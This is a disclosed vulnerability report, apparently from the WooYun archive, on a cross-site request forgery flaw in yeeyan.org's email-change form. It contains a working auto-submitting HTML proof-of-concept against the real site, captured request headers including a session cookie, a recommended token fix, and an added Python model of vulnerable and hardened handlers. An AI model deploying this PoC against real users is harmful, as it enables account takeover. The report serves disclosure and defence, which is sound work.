WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online archive ------------ http://drop.zone.ci/
2012-12-09: Vendor is being contacted and confirmation is pending; details are not publicly disclosed.
2013-01-23: Vendor has actively ignored the vulnerability; details are disclosed to the public.
The site's user panel has a function for changing the account's email address. The form behind it has no anti-forgery protection: the request carries nothing but the session cookie and the new address, so a page under an attacker's control can submit it on behalf of a logged-in user and set an email address that does not belong to that user (CSRF).
Proof-of-concept page. When a logged-in yeeyan user opens it, the script submits the form and the browser attaches the user's member.yeeyan.org cookies automatically:

<html>
<body>
<h2>CSRF Exploit to add </h2>
<!-- Same field name and encoding as the site's own change-email form -->
<form accept-charset="utf-8" method="POST" action="http://member.yeeyan.org/my/profile/email?" name="form0" enctype="multipart/form-data">
  <!-- attacker-chosen address; the value is obfuscated in this copy of the report -->
  <input type="text" name="data[email]" value="[email protected]" />
</form>
<script type="text/javascript">document.form0.submit();</script>
</body>
</html>
Headers of the forged submission, as captured in Chrome's developer tools. The request body contains only the data[email] field; no anti-CSRF token is sent, and the server answers 200 OK. Note that Origin and Referer in this capture are member.yeeyan.org itself, so a fix that relied on those headers alone would still have to be checked against the cross-site PoC above.
Request URL: http://member.yeeyan.org/my/profile/email?
Request Method: POST
Status Code: 200 OK

Request Headers
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: UTF-8,*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 157
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUBhOCXRqb1cABfRZ
Cookie: PHPSESSID=f6568962a1aafdfbf5719fa5d3400910; CakeCookie[ykey]=368997; __utma=68569166.1733295180.1354628709.1354813506.1354995318.3; __utmb=68569166.11.10.1354995318; __utmc=68569166; __utmz=68569166.1354813506.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E8%AF%91%E8%A8%80
Host: member.yeeyan.org
Origin: http://member.yeeyan.org
Referer: http://member.yeeyan.org/my/profile/email
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17

Request Payload
------WebKitFormBoundaryUBhOCXRqb1cABfRZ
Content-Disposition: form-data; name="data[email]"

[email protected]
------WebKitFormBoundaryUBhOCXRqb1cABfRZ--

Response Headers
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Sat, 08 Dec 2012 19:44:04 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx/0.8.47
Transfer-Encoding: chunked
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Fix: place an anti-CSRF token in the form, tied to the user's session, and verify it on the server when the form is submitted; reject any submission whose token is missing or does not match.
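Added example, not yeeyan.org's code (the report does not show the server side): a Python model of the /my/profile/email handler behaving as the report describes, next to a hardened version that applies the token check recommended above. The in-memory session store and user table, the hidden field name data[_token], the Origin check, and every address used are assumptions constructed for this demonstration.

```python
import hmac
import secrets

# Constructed stand-ins for the server's session store and user table.
# The real site (CakePHP on PHP 5.2, per the response headers) keeps these
# elsewhere; this is an added illustration, not the site's code.
SESSIONS = {}  # session cookie value -> {"user": name, "csrf_token": ...}
USERS = {}     # user name -> {"email": address}


def login(session_id, username, email):
    """Simulate a logged-in user whose browser holds session_id as a cookie."""
    USERS[username] = {"email": email}
    SESSIONS[session_id] = {"user": username}


def vulnerable_change_email(session_id, form):
    """Behaviour the report describes: any POST that carries the victim's
    session cookie is honoured, so a form auto-submitted from another site
    changes the address."""
    sess = SESSIONS.get(session_id)
    if sess is None:
        return 403, "not logged in"
    USERS[sess["user"]]["email"] = form["data[email]"]
    return 200, "email updated"


def render_email_form(session_id):
    """Render the change-email form with a per-session token in a hidden
    field. A page on another origin cannot read this response, so it cannot
    learn the token."""
    sess = SESSIONS[session_id]
    if "csrf_token" not in sess:
        sess["csrf_token"] = secrets.token_urlsafe(32)
    return (
        '<form method="POST" action="/my/profile/email">'
        f'<input type="hidden" name="data[_token]" value="{sess["csrf_token"]}" />'
        '<input type="text" name="data[email]" />'
        "</form>"
    )


def hardened_change_email(session_id, form, origin=None,
                          own_origin="http://member.yeeyan.org"):
    """Same endpoint with the fix: the submitted token must match the one
    stored in the session. An Origin check is added as a second layer."""
    sess = SESSIONS.get(session_id)
    if sess is None:
        return 403, "not logged in"
    expected = sess.get("csrf_token")
    supplied = form.get("data[_token]", "")
    # Fail closed when no token was ever issued; compare in constant time.
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "csrf token missing or invalid"
    # Browsers send Origin on cross-site POSTs; when present it must be ours.
    if origin is not None and origin != own_origin:
        return 403, "cross-origin request rejected"
    USERS[sess["user"]]["email"] = form["data[email]"]
    return 200, "email updated"


def demo():
    """Replay the report's scenario against both handlers; returns the results."""
    results = {}
    login("victim-sid", "victim", "victim@example.invalid")  # constructed data
    # What the PoC page sends: the victim's cookie (added by the browser) and
    # the attacker's address, nothing else.
    attacker_form = {"data[email]": "attacker@example.invalid"}

    results["vulnerable"] = vulnerable_change_email("victim-sid", attacker_form)
    results["vulnerable_email"] = USERS["victim"]["email"]

    login("victim-sid", "victim", "victim@example.invalid")  # reset the account
    render_email_form("victim-sid")                          # token now issued
    results["forged"] = hardened_change_email(
        "victim-sid", attacker_form, origin="http://attacker.invalid")
    results["forged_no_origin"] = hardened_change_email("victim-sid", attacker_form)
    results["email_after_forgery"] = USERS["victim"]["email"]

    # The legitimate form carries the token the server rendered into it.
    legit_form = {"data[email]": "new@example.invalid",
                  "data[_token]": SESSIONS["victim-sid"]["csrf_token"]}
    results["legitimate"] = hardened_change_email(
        "victim-sid", legit_form, origin="http://member.yeeyan.org")
    results["email_after_legit"] = USERS["victim"]["email"]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The token check is the actual fix: it is bound to the session, unguessable, and compared in constant time, and the PoC page cannot obtain it because the response that contains the form is not readable across origins. The Origin check is only an extra layer: the capture above shows a same-site submission carrying the site's own Origin, and some clients omit the header, which is why the handler enforces it only when it is present.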
Unable to contact the vendor, or the vendor actively refused.